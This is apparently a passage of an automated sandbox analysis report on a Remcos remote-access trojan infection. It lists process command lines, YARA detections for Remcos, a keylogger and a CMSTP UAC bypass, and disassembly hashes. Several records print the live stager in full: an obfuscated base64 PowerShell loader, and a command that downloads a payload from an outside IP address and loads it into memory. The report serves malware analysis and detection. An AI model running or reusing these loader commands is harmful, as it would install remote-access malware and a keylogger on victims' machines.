                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:03:36:05
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:03:36:08
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:10
                                                                                                      Start time:03:36:10
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c
                                                                                                      Imagebase:0x7ff642d20000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:12
                                                                                                      Start time:03:36:11
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                      Imagebase:0x7ff75c910000
                                                                                                      File size:22'528 bytes
                                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:13
                                                                                                      Start time:03:36:14
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:15
                                                                                                      Start time:03:36:21
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                      Imagebase:0xcb0000
                                                                                                      File size:43'008 bytes
                                                                                                      MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Executed Functions

                                                                                                        Function 00007FFAAC4537B5 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1573715512.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac450000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                        • Instruction ID: 6f88b0329515345a9c61e65f3469a8e9060db859324e1795e10e2e6537b9e572
                                                                                                        • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                        • Instruction Fuzzy Hash: D401677151CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661D636E882CB45

                                                                                                        Executed Functions

                                                                                                        Function 00007FFAAC55115D Relevance: 7.3, Strings: 4, Instructions: 2348COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 7> $(7> $P*$_
                                                                                                        • API String ID: 0-1822527071
                                                                                                        • Opcode ID: e4564b56d8ce57128add3daeee8afcb367866f3b5f2e6580bbe5dcf8ed5ace01
                                                                                                        • Instruction ID: 2d822be8a156814f6c5b70c9b2950ac1f0f0e245c57570074356fcc7697cdde5
                                                                                                        • Opcode Fuzzy Hash: e4564b56d8ce57128add3daeee8afcb367866f3b5f2e6580bbe5dcf8ed5ace01
                                                                                                        • Instruction Fuzzy Hash: 4BE23362E4EB8E8FE756972888555B57FE4EF57210B0881FFE08EC7193D919AC09C381
                                                                                                        Function 00007FFAAC5531C0 Relevance: 2.7, Strings: 2, Instructions: 163COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: h8> $p8>
                                                                                                        • API String ID: 0-2814837286
                                                                                                        • Opcode ID: e591236ea8f4c61bf844f51d122d29ba6586fddacb59a10744a6062df1eec454
                                                                                                        • Instruction ID: a0dff961e93d5d4a5ad9ff263d7f2e3634a15d788fec5aab12f7df3f64844c20
                                                                                                        • Opcode Fuzzy Hash: e591236ea8f4c61bf844f51d122d29ba6586fddacb59a10744a6062df1eec454
                                                                                                        • Instruction Fuzzy Hash: 4F510970D0961D8FEBA5DB68C8986E9BBB1EF59300F5005EED00DE7291CA35AAC5CF40
                                                                                                        Function 00007FFAAC48346F Relevance: .4, Instructions: 431COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 59025604f918c94ec6eee44e329d3362db32a65d53a06273fda3495ab508ae8b
                                                                                                        • Instruction ID: 0841661b3482790261f27d05ad8ba76da9963494b23bed7598172dbc9495309d
                                                                                                        • Opcode Fuzzy Hash: 59025604f918c94ec6eee44e329d3362db32a65d53a06273fda3495ab508ae8b
                                                                                                        • Instruction Fuzzy Hash: 5351493160D6858FE745EB2CD8999F47BE0EF57324B1842BED08DC71A3D929A84AC781
                                                                                                        Function 00007FFAAC551738 Relevance: .2, Instructions: 157COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fe5148fb6c8a179cd0a13491802f1bf43c8ad5f94cbbd740bbfda5185e86b98e
                                                                                                        • Instruction ID: a6a40384bc5b6ae0087195e61281eaa8f08a2d17188127e035a96425941fb0ef
                                                                                                        • Opcode Fuzzy Hash: fe5148fb6c8a179cd0a13491802f1bf43c8ad5f94cbbd740bbfda5185e86b98e
                                                                                                        • Instruction Fuzzy Hash: 3041E252D5EB8B4FF366532848656B26FA5DF57200B0981FAE44EC7193DC1AEC0D83D1
                                                                                                        Function 00007FFAAC553461 Relevance: .1, Instructions: 139COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d4cfc08604868d0cc87c8c456e1ced6e588f10810f21c2ae6174a76aa0b46aa6
                                                                                                        • Instruction ID: e79fd030d3eb0b7b478c6d4a71d23bd65f7718ad03d58cb607bc2c5eb6226cf0
                                                                                                        • Opcode Fuzzy Hash: d4cfc08604868d0cc87c8c456e1ced6e588f10810f21c2ae6174a76aa0b46aa6
                                                                                                        • Instruction Fuzzy Hash: 9E51197090962D8FDBA9DF68C8987ACBBB1EF59301F5041EED04DE76A1CA355A85CF00
                                                                                                        Function 00007FFAAC489CF9 Relevance: .1, Instructions: 122COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e90c9c6947a93ff7170ba4ee336a32f74a53c50c5ad67626307e9006d868e630
                                                                                                        • Instruction ID: 2c9ba306ad8534d4f4d110746481f11d8954a241f66507aaba57c2a0d500d809
                                                                                                        • Opcode Fuzzy Hash: e90c9c6947a93ff7170ba4ee336a32f74a53c50c5ad67626307e9006d868e630
                                                                                                        • Instruction Fuzzy Hash: F9418B70909A4ACFEB59DF98D8595FDBBF1EB69301F00413AD01EE3291CA24A9458B84
                                                                                                        Function 00007FFAAC551230 Relevance: .1, Instructions: 117COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9b9ad11847da680c4e13970d6b44c99480b20cd50a37486dfa39b07991092910
                                                                                                        • Instruction ID: e86bdda487a5ea3ac50b774d3a29deb7b0b8574679578e22b22b05b4267a5a3a
                                                                                                        • Opcode Fuzzy Hash: 9b9ad11847da680c4e13970d6b44c99480b20cd50a37486dfa39b07991092910
                                                                                                        • Instruction Fuzzy Hash: 523123A2E4FB8F8BF7959769086517A6ED99F12250B5841BDE40FC71D2DC0AD84C8381
                                                                                                        Function 00007FFAAC489D38 Relevance: .1, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 40afd575c30beaaa062f67bf5a6cd57a69a7e41e3b1680fd98d1f3246f664f24
                                                                                                        • Instruction ID: d6673054a7974b5fb8908753b72fa7ae49b88b13dc166f2abf4713c220c5d19e
                                                                                                        • Opcode Fuzzy Hash: 40afd575c30beaaa062f67bf5a6cd57a69a7e41e3b1680fd98d1f3246f664f24
                                                                                                        • Instruction Fuzzy Hash: C431CE7090DA8A8FEB4ADF64C8655F9BBF1FF56301F04816ED01AD7292CA34A945CBC1
                                                                                                        Function 00007FFAAC484295 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                        • Instruction ID: 2724c3d3a17d334ee1092ce002ed42cbe3c4f0618e834c606a8bcd16dd44d845
                                                                                                        • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                        • Instruction Fuzzy Hash: 5201677111CB0C8FD744EF0CE451AB5B7E0FB95364F10056DE58AC36A5DA36E881CB45
                                                                                                        Function 00007FFAAC483758 Relevance: .0, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1374836ca91e80a4b3ab409431d90c3a2d658d893e86d830d284faa13db87aed
                                                                                                        • Instruction ID: 4405cb5726b2a004fbe6d098eea36712133f60645efbd7abb174c46b028adc04
                                                                                                        • Opcode Fuzzy Hash: 1374836ca91e80a4b3ab409431d90c3a2d658d893e86d830d284faa13db87aed
                                                                                                        • Instruction Fuzzy Hash: 99F0373275C6048FDB4CAA1CF4429B573D1E795324B10416EE48BC2696D917E8468785
                                                                                                        Function 00007FFAAC55366E Relevance: .0, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fa63dfb50f7f391e2e2f0ae46fd18d2138fc06cfe704763022bdd06a1cd59f0d
                                                                                                        • Instruction ID: 94d423db68df97f9a016b1008dff948d8bd0d05a12f7f441f8969d1ce62772e2
                                                                                                        • Opcode Fuzzy Hash: fa63dfb50f7f391e2e2f0ae46fd18d2138fc06cfe704763022bdd06a1cd59f0d
                                                                                                        • Instruction Fuzzy Hash: 40017271A1896C8FDB90EB28C89DB99B7F5FF5A301F4405E5904CD7261DA34AE81CF00
                                                                                                        Function 00007FFAAC489E74 Relevance: .0, Instructions: 34COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4d1ba689204d017ec913a79f938ba19731d04a6a7c81aa78f8121614fefbea28
                                                                                                        • Instruction ID: 441e2f305a5e7b66c298faaaba42482fded4d1792aad2f0f469f8d3c4893cc83
                                                                                                        • Opcode Fuzzy Hash: 4d1ba689204d017ec913a79f938ba19731d04a6a7c81aa78f8121614fefbea28
                                                                                                        • Instruction Fuzzy Hash: 09F03C34E0D50ACBEB18DB54C4958BDB7B6EB9A315F10812DC01EA72C1DE34AA46CBD8
                                                                                                        Function 00007FFAAC5504C8 Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1519690531.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 51d26b4f118e658e8d756de34d8e283cd9f2b8f92233e30c5f9e9e60e77f0283
                                                                                                        • Instruction ID: fcb0b79a911725bd7deb117bf6e8ffd82ee366f6c5b5a40b3c3f2eff2bc88f3b
                                                                                                        • Opcode Fuzzy Hash: 51d26b4f118e658e8d756de34d8e283cd9f2b8f92233e30c5f9e9e60e77f0283
